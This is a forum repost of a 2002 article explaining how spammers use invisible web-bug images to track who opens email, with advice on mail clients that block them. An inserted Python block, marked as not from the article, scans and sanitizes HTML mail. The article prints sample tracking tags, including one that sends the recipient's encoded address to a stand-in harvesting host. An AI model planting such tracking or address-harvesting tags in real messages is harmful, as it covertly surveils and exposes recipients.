denolth2
03-11-02, 12:08 PM
Some information on spammers and email spying:
taken from Informit.com
denolth2 :O
Web Bugs: How Spammers and Web Designers Are Using Invisible Images To Keep Track Of You
by Kyle Cassidy, Joseph Dries, the Authors of "The Concise Guide to Enterprise Internetworking and Security."
MAR 08, 2002
Spam Spam Spam Spam Spam Spam Spam Spam and Spam
Last week I got a piece of spam. Spam, of course, is unsolicited, bulk, commercial email—not
to be confused with the Hormel meat product. It's not unusual that I got a piece of spam
last week, actually; having had the same email address for ten years now, I get a lot of it.
Mostly advertising ***** enlargements, herbal Viagra, and Hot Young Teens doing all sorts of
things.
I, like many of you, feel it my personal responsibility to respond to each and every piece
of spam that I get, usually with carbon copies upstream to those hosting spammers' Web sites
and to sad sysadmins who most likely already know they left their SMTP ports unguarded. I do
this because I am certain that spam is the Internet's ugliest side. Because spam is not yet
properly defined by law in the U.S. or most European nations, there are no enforceable
regulations preventing its continuing growth. In the U.S., for example, there are five
pieces of legislation before the House and one before the Senate that deal with spam. Not
one of them prohibits the sending of spam; only the normal dirty tricks, such as falsifying
headers, misleading subject lines, fraudulent content, and so on.
Trying to dig the six legitimate pieces of email out of 100 Multi Level Marketing (MLM)
scams over a 14.4k modem on a shaky phone line in Cairo will make the most even-tempered of
us furious at those trying to sell home-based businesses by sending copies of their
advertisement to half a million Internet users in the hopes that one or two people will buy
it.
Clever Payload
This time, amid the potions guaranteed to enlarge my bust and
ten-day-no-risk-no-money-down-work-at-home-stuffing-envelopes plans that would significantly
increase my wealth, one piece of spam stood out. It appeared in my Outlook Express window as
a completely blank message. Which in itself isn't necessarily shocking because I have a
feeling that most people sending out spam are very new to the Internet, but it still puzzled
me. So I checked to see if there was any HTML in the message—for some reason, spammers seem
incapable of sending messages in ASCII. And sure enough, there was. There was a single line
of ingenious HTML that looked like this:
<img src="http://somewhere.foo.bar/images/zero.jpg">
This turned out to be a one-kilobyte .jpeg file that measured a single white pixel across.
Nearly invisible. It really was, as you may have guessed, an insidious and surreptitious
"return receipt requested." When the email is opened, the .jpeg file is automatically
downloaded by your HTML viewing email client. What does this do, though? It creates a log
entry in a Web server (in this case located in Hong Kong) that says that you opened the
email, when you opened the email, and the IP address you opened the email from.
Call an Exterminator! It's a Web Bug!
Those well-versed in Internet entomology (or even Internet etymology) will recognize this as
a Web Bug (also known as a "1x1 gif" or a "clear .gif") that is used for tracking the
movements of people viewing HTML, either in an email message or on the Web in general.
What Are the Implications?
Well, the most disconcerting is that your location, more or less, is harvested by
simply opening the email. Most Web servers can be set to save log files that will include
your IP address, the file you accessed, and the time you accessed it. Although Web Bugs
might not be the most accurate method of tracking someone down, it's enough to let them know
that you're reading your email at a Kinko's terminal in Raleigh, North Carolina.
There are more insidious ways that HTML can be manipulated to gather addresses. HTML tags
can be used to request remote documents. Tags that generally automatically retrieve remote
images or documents include img, frame, link, and the background= attribute used with body
and table. When the URL encodes the recipient's address, as in the following, the spam sender
not only gathers passive intelligence such as your email reading habits, IP address, operating
system, and browser, but actually verifies your email address:
<img src="http://somewhere.foo.bar/harvest.pl?emailid%3Daddress%40example.com">
Although this
method is probably impractical for verifying tens of thousands of individual addresses, it
is useful for several things:
It identifies percentages of people using HTML-compliant mail readers.
It identifies a general level of "completeness" of a bulk emailer's mailing list. For
example, if 2,000,000 emails are sent out, and the .jpeg file is downloaded 1,000,000 times,
the spamvertiser can assume that about half the addresses on the list are bad.
It can track down a single individual. Such an email sent to only one person and opened by
that person results in a log entry revealing the IP address that the recipient was reading
mail from. Maybe not the best way to locate deadbeat dads, but probably good enough to tell
if Osama Bin Laden is reading his email from a coffee shop in Milan.
It can identify who will open what type of message. A Web Bug can be used nefariously inside
a corporation to see who might read email that the company doesn't like. For example, a
bogus message with the topic "On-line games you can play during office hours!" might contain
a Web Bug that returns a list of all the employees who had opened it.
It can track who reads particular Usenet NEWS messages. Because programs such as Outlook and
Netscape can post and read HTML mail messages to Usenet NEWS groups, it's possible to post a
Web Bug as part of a NEWS message, and track who and how many people read that message. A
typical example of this is law enforcement compiling a database of people who read a post
about an illegal or suspicious activity; a message entitled "bomb recipes" for example.
It can track how email is forwarded. People who are interested in how viruses get from one
place to another, or who wonder how virus hoaxes or jokes get forwarded from person to
person can use a Web Bug to trace the path of an email message from user to user.
Innocuous info that is passively gathered can easily be used by black hats (criminal
hackers, or crackers) to check and see whether you've applied all the Microsoft security
patches.
A verifiable working email address can be sold to others looking to join the spam wagon.
Protecting Yourself from HTML Snooping
From a security standpoint, anything that comes from somewhere else and runs applications on
your computer, no matter how seemingly innocuous, is a threat, and should be avoided if
possible. However, in many ways, the horse is already out of the proverbial barn here. HTML
is, for the most part, probably here to stay as it is built in as a default "feature" to
more and more email clients. It's also difficult to explain to novice users why their
flowered stationery and HUGE BLUE FONTS WITH UNDERLINES AND EMPHASIS are not as good as
plain old boring ASCII text where italics are indicated by _manually added pre- and
postpended underscores_.
The best way to protect yourself from this kind of snooping is to use a mail reader that does
not render HTML. Unix-based mail readers such as MUTT, ELM, and PINE not only don't fall
for this trick, but they're immune to the Microsoft-specific viruses that currently plague
the Earth.
Mail Readers that Don't Display Exterior Graphics
Luckily, there are several email programs that interpret the innocuous parts of HTML (bold
and italics, for example) without displaying Web Bugs and other exterior graphics:
Eudora 5.1 for Windows and Mac OS: http://www.eudora.com/.
Evolution for UNIX/Linux: http://www.ximian.com/.
Mail.app for MacOS X: http://www.apple.com/macosx/.
Entourage, part of Office 2001 for MacOS 9 or Office X for MacOS X:
http://www.microsoft.com/macoffice/.
Generally, they have a toggle such as "display HTML that is included in message only," or
"Disable the download of HTML images" so that the HTML formatting is kept, but linked bits
are not. Most email clients today also strip JavaScript from included HTML. Unfortunately,
the user can often be easily convinced to open an attachment that is actually a program that
installs a backdoor trojan or worm. Those types of attachments are best dealt with on the
mail server.
Web-based Email Clients that Are Safe
Many people use the most popular free mail services such as Hotmail, Yahoo, and so on. Those
services currently don't offer the capability to turn off HTML emails. For those people who
want to make their email accessible via the Web, there are several freely available clients
that work with the Internet standards POP3 or IMAP. This means you can easily replace the
troublesome Outlook Web Access with something safer and easily modifiable.
SquirrelMail (http://www.squirrelmail.org/) is a nice, lightweight, Web-based email client.
The recently released 1.2.x series allows the administrator to enable or disable HTML email
viewing by default, and, if enabled, includes an HTML view that strips out the JavaScript,
meta tags, and any images/documents that were not included in the email itself. SquirrelMail
is extensible through the use of plug-ins that change or enhance the behavior and features
of SquirrelMail. This allows the administrator to decide how much is necessary.
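As an added illustration (not code from the article, nor SquirrelMail's own), the following Python scans one HTML mail body for the remote-loading references described under "What Are the Implications?", decodes what a harvest.pl-style URL carries, and rebuilds the body the way the SquirrelMail HTML view is described as doing: scripts, meta tags and anything not shipped inside the message are dropped, while inline formatting and cid: images survive. The sample message reuses the article's somewhere.foo.bar host and zero.jpg/harvest.pl URLs; everything else in it is constructed.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl, unquote, urlsplit

# Attributes a mail client fetches on render: the article's img, frame, link, background= cases.
REMOTE_ATTRS = {"img": "src", "frame": "src", "iframe": "src", "link": "href",
                "body": "background", "table": "background", "td": "background"}
DROP_TAGS = {"script", "style", "meta", "link", "frame", "iframe"}  # removed outright
VOID_DROP = {"meta", "link"}  # dropped tags that never have a closing tag

def is_remote(url):
    """True for a reference fetched over the network; cid: is a MIME part of the message."""
    return urlsplit(url.strip()).scheme.lower() not in ("", "cid", "data")

def decode_tracking_url(url):
    """(host, decoded query) of a web-bug URL. The harvest URL percent-encodes
    '=' and '@', so unquote first or parse_qsl sees no name=value pair at all."""
    parts = urlsplit(url)
    return parts.hostname, dict(parse_qsl(unquote(parts.query), keep_blank_values=True))

class WebBugScanner(HTMLParser):
    """Collects remote references; rebuilds the HTML without scripts, meta, on* handlers or them."""
    def __init__(self):
        super().__init__()
        self.findings, self.out, self._skip = [], [], 0

    def handle_starttag(self, tag, attrs):
        attrs = [(n, v) for n, v in attrs if v is not None]
        for name, value in attrs:
            if name == REMOTE_ATTRS.get(tag) and is_remote(value):
                self.findings.append((tag, value))
        if tag in DROP_TAGS:
            self._skip += tag not in VOID_DROP  # swallow content up to the closing tag
        if self._skip or tag in DROP_TAGS:
            return
        kept = [(n, v) for n, v in attrs if not n.startswith("on")
                and not (n == REMOTE_ATTRS.get(tag) and is_remote(v))]
        if tag == "img" and not any(n == "src" for n, _ in kept):
            return  # the bug was this image's only content; drop it entirely
        self.out.append("<%s%s>" % (tag, "".join(
            ' %s="%s"' % (n, html.escape(v)) for n, v in kept)))

    def handle_endtag(self, tag):
        if tag in DROP_TAGS:
            self._skip = max(0, self._skip - (tag not in VOID_DROP))
        elif not self._skip:
            self.out.append("</%s>" % tag)

    def handle_data(self, data):
        if not self._skip:
            self.out.append(html.escape(data, quote=False))

def scan_message(html_body):
    """Return (remote references found, sanitized HTML) for one mail body."""
    p = WebBugScanner()
    p.feed(html_body)
    p.close()
    return p.findings, "".join(p.out)

# Constructed sample: two web bugs, a background bug, an inline cid: image, a script.
SAMPLE = ('<html><body background="http://somewhere.foo.bar/bg.gif"><script>x=1</script>'
          '<p>Hot <b>offer</b> &amp; more</p><img src="http://somewhere.foo.bar/images/zero.jpg">'
          '<img src="http://somewhere.foo.bar/harvest.pl?emailid%3Daddress%40example.com">'
          '<img src="cid:logo@example.com" onload="alert(1)"></body></html>')
```

Running scan_message(SAMPLE) reports the three remote references (the background, the one-pixel image and the address-harvesting URL) and returns a body in which only the paragraph markup and the cid: image remain.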
IMP (http://horde.org/imp/), the Internet Mail Program, is another Web-based, fully featured
email client that doesn't by default display HTML emails. IMP is part of the Horde Project,
which is a platform for Web-based applications for productivity, messaging, and project
management.
If you own Microsoft Office, you can use Outlook (98, 2000, or XP). However, be absolutely
certain to apply all the software and security updates. In and of itself, it does not make
you immune to Web Bugs, but it does prevent many other associated problems, such as
JavaScript and other scripting attacks. You can make it display ASCII only, but not in the
simple "display only ASCII" manner you would expect from a piece of software that requires
135 megabytes of free disk space to install. Instead, it requires that you first turn off
the preview pane (in View, Layout, uncheck Show preview pane). Then, every time you want to
read a message, you need to right-click on the message, select Properties, Details, and
Message source.
Microsoft shows the way:
http://support.microsoft.com/directory/article.asp?ID=KB;EN-US;q165531.
If you only have Outlook Express installed on your computer, you are better off NOT using it
and finding another email client such as Eudora (or even a different operating system whose
focus is more on keeping your data safe rather than turning on features that make you a
target).:rolleyes: